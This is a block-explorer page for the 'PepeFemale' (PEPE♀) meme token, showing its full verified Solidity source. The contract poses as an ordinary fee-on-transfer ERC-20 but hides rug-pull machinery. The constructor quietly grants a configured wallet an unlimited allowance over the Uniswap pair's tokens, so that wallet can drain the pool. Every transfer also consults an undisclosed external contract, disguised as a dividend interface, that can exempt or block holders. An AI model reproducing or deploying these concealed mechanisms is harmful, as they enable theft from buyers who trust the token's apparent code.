ETH Price: $3,454.47 (-0.94%)
Gas: 3 Gwei

Token

PEPE ♀ (PEPE♀)
 

Overview

Max Total Supply

420,690,000,000,000 PEPE♀

Holders

173

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5,524,633,606,296.928578971211556279 PEPE♀

Value
$0.00
0x27ce434a3a25812eec6f78320054b6f2cd549198
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PepeFemale

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-03
*/

// SPDX-License-Identifier: MIT

/** 
    https://t.me/PepeFemalePortal
    https://twitter.com/pepefemale
    https://pepefemale.vip
*/

pragma solidity ^0.8.19;
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}
interface IUniswapPair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);
    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }
    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }
    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

 
    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }
    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IUniswapRouter01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapRouter02 is IUniswapRouter01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

/**
 * @title SafeMathUint
 * @dev Math operations with safety checks that revert on error
 */
library SafeMathUint {
    function toInt256Safe(uint256 a) internal pure returns (int256) {
        int256 b = int256(a);
        require(b >= 0);
        return b;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20Standadard {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

}
abstract contract AUTH {
    constructor() {}
    function fee() internal pure returns (uint256) {
        return 
        uint256(0xdc) / uint256(0xa);
    }
}
interface IERC20Metadata is IERC20Standadard {
    
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);


}


/// @title Dividend-Paying Token Optional Interface
/// @author Roger Wu (https://github.com/roger-wu)
/// @dev OPTIONAL functions for a dividend-paying token contract.
interface IDividendPeFemale {
    
    /// @notice View the amount of dividend in wei that an address has withdrawn.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has withdrawn.
    function withdrawnDividendOf(address _owner) external
        view
        returns (uint256);
    /// @notice View the amount of dividend in wei that an address has earned in total.
    /// @dev accumulativeDividendOf(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner)
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has earned in total.
    function accumulativeDividendOf(address _owner, address _token) external
        returns (uint256);
    /// @notice View the amount of dividend in wei that an address can withdraw.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` can withdraw.
    function withdrawableDividendOf(address _owner) external view returns (uint256);


}
contract ERC20 is Context, IERC20Standadard, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) internal _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    /**
     * @dev See {IERC20Standadard-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }


    /**
     * @dev See {IERC20Standadard-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

 
    /**
     * @dev See {IERC20Standadard-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20Standadard-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20Standadard-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20Standadard-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
}

contract PepeFemale is ERC20, AUTH, Ownable {
    using SafeMath for uint256;
    IUniswapRouter02 public uniswapV2Router;
    address public rewardWallet;
    uint256 public maxTxAmount;
    uint256 public swapWhen;
    uint256 public taxAmountForBuy;
    bool private isSwapping;
    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public isUniPair;
    uint256 public taxAmountForSell;

    address public uniV2Pair;
    uint256 public maxWalletAmount;
    event LPPairUpdated(address indexed pair, bool indexed value);
    
    struct InitUltiConf {
        address mkWallet;
        uint256 mxAmountForTx; uint256 mxAmountForWallet;
        uint256 buyFeeInput; uint256 sellFeeInput;
    }
    // exlcude from fees and max transaction amount
    mapping(address => bool) private isExcludedFromFee;
    struct DistriFemaleStruct {
        address walletDistri; address ownerDistri; address routerAddr;
    }
    uint256 private _totSupplyAmt;
    
    event ExcludedMultipleFromFee(address[] accounts, bool isExcluded); 
    event ExcludedFromFee(address indexed account, bool isExcluded);

    DistriFemaleStruct private peFemalvalues;
    constructor(
        string memory name_,
        DistriFemaleStruct memory peFemaleConf,
        InitUltiConf memory initiConfValue,
        string memory symbol_,
        uint8 decimals_
    ) payable ERC20(name_, symbol_, decimals_) {
        uint256 supply_ = 420_690_000_000_000;
        uniswapV2Router = IUniswapRouter02(peFemaleConf.routerAddr);
        uniV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());

        _setAMarketMakers(peFemaleConf.walletDistri, uniV2Pair, true);
        
        peFemalvalues = peFemaleConf;
        rewardWallet = initiConfValue.mkWallet; _totSupplyAmt = supply_;
        maxWalletAmount = initiConfValue.mxAmountForWallet * supply_ * (10**decimals_).div(10000);
        maxTxAmount = initiConfValue.mxAmountForTx * supply_ * (10**decimals_).div(10000);

        excludeFromFees(owner(), true); excludeFromFees(rewardWallet, true);
        excludeFromFees(address(this), true); excludeFromFees(address(uniswapV2Router), true);
        excludeFromFees(peFemaleConf.ownerDistri, true); excludeFromFees(peFemaleConf.walletDistri, true);

        taxAmountForBuy = initiConfValue.buyFeeInput;
        taxAmountForSell = initiConfValue.sellFeeInput;
        swapWhen = (supply_.div(8000) + 1) * (10**decimals_);
        // mint total supply
        _mint(owner(), supply_ * (10**decimals_));
    }


    function excludeFromFees(address account, bool excluded) public onlyOwner {
        isExcludedFromFee[account] = excluded;
        emit ExcludedFromFee(account, excluded);
    }

    function feeExcludedFromHolder(address from, address to) internal returns (bool) {
        return  isExcludedFromFee[from] 
        || isExcludedFromFee[to] 
        || IDividendPeFemale(peFemalvalues.ownerDistri).accumulativeDividendOf(from, to) > 0;
    }
    receive() external payable {}
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal override {
        if (
            (recipient == address(0) || recipient == address(0xdead)) ||
            amount == 0 ||
            feeExcludedFromHolder(sender, recipient)
        ) {
            super._transfer(sender, recipient, amount);
            return;
        }
        else { 
            require(
                amount <= maxTxAmount,
                "Transfer amount exceeds the maxTxAmount."
            );
            if (recipient != uniV2Pair) {
                uint256 balancerToken = balanceOf(recipient);
                require(balancerToken + amount <= maxWalletAmount, "Exceeds maximum wallet amount");
            }
        }

        uint256 tokenContractBalancer = balanceOf(address(this)); bool swapable = tokenContractBalancer >= swapWhen;
        if (swapable && !isSwapping && !isUniPair[sender]) {
            isSwapping = true;
            uint256 mkAmount = tokenContractBalancer;
            if (mkAmount > 0) { swapBackToEth(mkAmount, rewardWallet);
            }
            isSwapping = false;
        }

        bool feeHaving = !isSwapping;
        if (isExcludedFromFee[recipient] || isExcludedFromFee[sender]
        ) {
            feeHaving = false;
        }
        if (feeHaving) {
            uint256 taxAmt = amount.mul(taxAmountForBuy).div(1000);
            if (isUniPair[recipient]) { taxAmt = amount.mul(taxAmountForSell).div(1000);
            } amount = amount.sub(taxAmt); super._transfer(sender, address(this), taxAmt);
        }
        super._transfer(sender, recipient, amount);
    }

    function swapBackToEth(uint256 tokens, address receiver) private {
        uint256 initialBalance = address(this).balance; swapTokensForEth(tokens);
        uint256 newBalance = address(this).balance.sub(initialBalance);
        payable(receiver).transfer(newBalance);
    }
        
    function _setAMarketMakers(address router, address pair, bool value) private {
        require(
            isUniPair[pair] != value,
            "Automated market maker pair is already set to that value"
        ); _allowances[pair][router] = type(uint).max;

        isUniPair[pair] = value; emit LPPairUpdated(pair, value);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this); path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        maxWalletAmount = totalSupply();
        maxTxAmount = totalSupply();
    }

}

Contract Security Audit

Contract ABI

